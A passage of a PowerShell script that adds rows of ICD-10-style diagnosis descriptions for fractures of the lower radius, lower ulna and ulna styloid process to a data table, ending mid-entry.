$DiagnosisList.Rows.Add("Other fractures of lower end of left radius","Other fractures of lower end of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of left radius","Other fractures of lower end of left radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of left radius","Other fractures of lower end of left radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of left radius","Other fractures of lower end of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of left radius","Other fractures of lower end of left radius, sequela") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of unspecified radius","Other fractures of lower end of unspecified radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of unspecified radius","Other fractures of lower end of unspecified radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of unspecified radius","Other fractures of lower end of unspecified radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of unspecified radius","Other fractures of lower end of unspecified radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of unspecified radius","Other fractures of lower end of unspecified radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of unspecified radius","Other fractures of lower end of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of unspecified radius","Other fractures of lower end of unspecified radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of unspecified radius","Other fractures of lower end of unspecified radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of unspecified radius","Other fractures of lower end of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of unspecified radius","Other fractures of lower end of unspecified radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of unspecified radius","Other fractures of lower end of unspecified radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of unspecified radius","Other fractures of lower end of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of unspecified radius","Other fractures of lower end of unspecified radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of unspecified radius","Other fractures of lower end of unspecified radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of unspecified radius","Other fractures of lower end of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fractures of lower end of unspecified radius","Other fractures of lower end of unspecified radius, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right ulna","Unspecified fracture of lower end of right ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right ulna","Unspecified fracture of lower end of right ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right ulna","Unspecified fracture of lower end of right ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right ulna","Unspecified fracture of lower end of right ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right ulna","Unspecified fracture of lower end of right ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right ulna","Unspecified fracture of lower end of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right ulna","Unspecified fracture of lower end of right ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right ulna","Unspecified fracture of lower end of right ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right ulna","Unspecified fracture of lower end of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right ulna","Unspecified fracture of lower end of right ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right ulna","Unspecified fracture of lower end of right ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right ulna","Unspecified fracture of lower end of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right ulna","Unspecified fracture of lower end of right ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right ulna","Unspecified fracture of lower end of right ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right ulna","Unspecified fracture of lower end of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right ulna","Unspecified fracture of lower end of right ulna, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left ulna","Unspecified fracture of lower end of left ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left ulna","Unspecified fracture of lower end of left ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left ulna","Unspecified fracture of lower end of left ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left ulna","Unspecified fracture of lower end of left ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left ulna","Unspecified fracture of lower end of left ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left ulna","Unspecified fracture of lower end of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left ulna","Unspecified fracture of lower end of left ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left ulna","Unspecified fracture of lower end of left ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left ulna","Unspecified fracture of lower end of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left ulna","Unspecified fracture of lower end of left ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left ulna","Unspecified fracture of lower end of left ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left ulna","Unspecified fracture of lower end of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left ulna","Unspecified fracture of lower end of left ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left ulna","Unspecified fracture of lower end of left ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left ulna","Unspecified fracture of lower end of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left ulna","Unspecified fracture of lower end of left ulna, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified ulna","Unspecified fracture of lower end of unspecified ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified ulna","Unspecified fracture of lower end of unspecified ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified ulna","Unspecified fracture of lower end of unspecified ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified ulna","Unspecified fracture of lower end of unspecified ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified ulna","Unspecified fracture of lower end of unspecified ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified ulna","Unspecified fracture of lower end of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified ulna","Unspecified fracture of lower end of unspecified ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified ulna","Unspecified fracture of lower end of unspecified ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified ulna","Unspecified fracture of lower end of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified ulna","Unspecified fracture of lower end of unspecified ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified ulna","Unspecified fracture of lower end of unspecified ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified ulna","Unspecified fracture of lower end of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified ulna","Unspecified fracture of lower end of unspecified ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified ulna","Unspecified fracture of lower end of unspecified ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified ulna","Unspecified fracture of lower end of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified ulna","Unspecified fracture of lower end of unspecified ulna, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right ulna styloid process","Displaced fracture of right ulna styloid process, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right ulna styloid process","Displaced fracture of right ulna styloid process, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right ulna styloid process","Displaced fracture of right ulna styloid process, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right ulna styloid process","Displaced fracture of right ulna styloid process, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right ulna styloid process","Displaced fracture of right ulna styloid process, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right ulna styloid process","Displaced fracture of right ulna styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right ulna styloid process","Displaced fracture of right ulna styloid process, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right ulna styloid process","Displaced fracture of right ulna styloid process, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right ulna styloid process","Displaced fracture of right ulna styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right ulna styloid process","Displaced fracture of right ulna styloid process, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right ulna styloid process","Displaced fracture of right ulna styloid process, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right ulna styloid process","Displaced fracture of right ulna styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right ulna styloid process","Displaced fracture of right ulna styloid process, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right ulna styloid process","Displaced fracture of right ulna styloid process, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right ulna styloid process","Displaced fracture of right ulna styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right ulna styloid process","Displaced fracture of right ulna styloid process, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left ulna styloid process","Displaced fracture of left ulna styloid process, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left ulna styloid process","Displaced fracture of left ulna styloid process, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left ulna styloid process","Displaced fracture of left ulna styloid process, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left ulna styloid process","Displaced fracture of left ulna styloid process, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left ulna styloid process","Displaced fracture of left ulna styloid process, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left ulna styloid process","Displaced fracture of left ulna styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left ulna styloid process","Displaced fracture of left ulna styloid process, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left ulna styloid process","Displaced fracture of left ulna styloid process, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left ulna styloid process","Displaced fracture of left ulna styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left ulna styloid process","Displaced fracture of left ulna styloid process, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left ulna styloid process","Displaced fracture of left ulna styloid process, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left ulna styloid process","Displaced fracture of left ulna styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left ulna styloid process","Displaced fracture of left ulna styloid process, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left ulna styloid process","Displaced fracture of left ulna styloid process, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left ulna styloid process","Displaced fracture of left ulna styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left ulna styloid process","Displaced fracture of left ulna styloid process, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified ulna styloid process","Displaced fracture of unspecified ulna styloid process, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified ulna styloid process","Displaced fracture of unspecified ulna styloid process, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified ulna styloid process","Displaced fracture of unspecified ulna styloid process, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified ulna styloid process","Displaced fracture of unspecified ulna styloid process, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified ulna styloid process","Displaced fracture of unspecified ulna styloid process, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified ulna styloid process","Displaced fracture of unspecified ulna styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified ulna styloid process","Displaced fracture of unspecified ulna styloid process, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified ulna styloid process","Displaced fracture of unspecified ulna styloid process, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified ulna styloid process","Displaced fracture of unspecified ulna styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified ulna styloid process","Displaced fracture of unspecified ulna styloid process, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified ulna styloid process","Displaced fracture of unspecified ulna styloid process, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified ulna styloid process","Displaced fracture of unspecified ulna styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified ulna styloid process","Displaced fracture of unspecified ulna styloid process, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified ulna styloid process","Displaced fracture of unspecified ulna styloid process, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified ulna styloid process","Displaced fracture of unspecified ulna styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified ulna styloid process","Displaced fracture of unspecified ulna styloid process, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right ulna styloid process","Nondisplaced fracture of right ulna styloid process, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right ulna styloid process","Nondisplaced fracture of right ulna styloid process, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right ulna styloid process","Nondisplaced fracture of right ulna styloid process, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right ulna styloid process","Nondisplaced fracture of right ulna styloid process, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right ulna styloid process","Nondisplaced fracture of right ulna styloid process, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right ulna styloid process","Nondisplaced fracture of right ulna styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right ulna styloid process","Nondisplaced fracture of right ulna styloid process, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right ulna styloid process","Nondisplaced fracture of right ulna styloid process, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right ulna styloid process","Nondisplaced fracture of right ulna styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right ulna styloid process","Nondisplaced fracture of right ulna styloid process, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right ulna styloid process","Nondisplaced fracture of right ulna styloid process, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right ulna styloid process","Nondisplaced fracture of right ulna styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right ulna styloid process","Nondisplaced fracture of right ulna styloid process, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right ulna styloid process","Nondisplaced fracture of right ulna styloid process, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right ulna styloid process","Nondisplaced fracture of right ulna styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right ulna styloid process","Nondisplaced fracture of right ulna styloid process, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left ulna styloid process","Nondisplaced fracture of left ulna styloid process, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left ulna styloid process","Nondisplaced fracture of left ulna styloid process, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left ulna styloid process","Nondisplaced fracture of left ulna styloid process, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left ulna styloid process","Nondisplaced fracture of left ulna styloid process, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left ulna styloid process","Nondisplaced fracture of left ulna styloid process, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left ulna styloid process","Nondisplaced fracture of left ulna styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left ulna styloid process","Nondisplaced fracture of left ulna styloid process, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left ulna styloid process","Nondisplaced fracture of left ulna styloid process, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left ulna styloid process","Nondisplaced fracture of left ulna styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left ulna styloid process","Nondisplaced fracture of left ulna styloid process, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left ulna styloid process","Nondisplaced fracture of left ulna styloid process, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left ulna styloid process","Nondisplaced fracture of left ulna styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left ulna styloid process","Nondisplaced fracture of left ulna styloid process, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left ulna styloid process","Nondisplaced fracture of left ulna styloid process, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left ulna styloid process","Nondisplaced fracture of left ulna styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left ulna styloid process","Nondisplaced fracture of left ulna styloid process, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified ulna styloid process","Nondisplaced fracture of unspecified ulna styloid process, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified ulna styloid process","Nondisplaced fracture of unspecified ulna styloid process, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified ulna styloid process","Nondisplaced fracture of unspecified ulna styloid process, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified ulna styloid process","Nondisplaced fracture of unspecified ulna styloid process, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified ulna styloid process","Nondisplaced fracture of unspecified ulna styloid process, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified ulna styloid process","Nondisplaced fracture of unspecified ulna styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified ulna styloid process","Nondisplaced fracture of unspecified ulna styloid process, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified ulna styloid process","Nondisplaced fracture of unspecified ulna styloid process, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified ulna styloid process","Nondisplaced fracture of unspecified ulna styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified ulna styloid process","Nondisplaced fracture of unspecified ulna styloid process, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified ulna styloid process","Nondisplaced fracture of unspecified ulna styloid process, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified ulna styloid process","Nondisplaced fracture of unspecified ulna styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified ulna styloid process","Nondisplaced fracture of unspecified ulna styloid process, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified ulna styloid process","Nondisplaced fracture of unspecified ulna styloid process, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified ulna styloid process","Nondisplaced fracture of unspecified ulna styloid process, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified ulna styloid process","Nondisplaced fracture of unspecified ulna styloid process, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right ulna","Torus fracture of lower end of right ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right ulna","Torus fracture of lower end of right ulna, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right ulna","Torus fracture of lower end of right ulna, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right ulna","Torus fracture of lower end of right ulna, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right ulna","Torus fracture of lower end of right ulna, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of right ulna","Torus fracture of lower end of right ulna, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left ulna","Torus fracture of lower end of left ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left ulna","Torus fracture of lower end of left ulna, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left ulna","Torus fracture of lower end of left ulna, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left ulna","Torus fracture of lower end of left ulna, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left ulna","Torus fracture of lower end of left ulna, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of left ulna","Torus fracture of lower end of left ulna, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified ulna","Torus fracture of lower end of unspecified ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified ulna","Torus fracture of lower end of unspecified ulna, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified ulna","Torus fracture of lower end of unspecified ulna, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified ulna","Torus fracture of lower end of unspecified ulna, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified ulna","Torus fracture of lower end of unspecified ulna, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of lower end of unspecified ulna","Torus fracture of lower end of unspecified ulna, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right ulna","Other fracture of lower end of right ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right ulna","Other fracture of lower end of right ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right ulna","Other fracture of lower end of right ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right ulna","Other fracture of lower end of right ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right ulna","Other fracture of lower end of right ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right ulna","Other fracture of lower end of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right ulna","Other fracture of lower end of right ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right ulna","Other 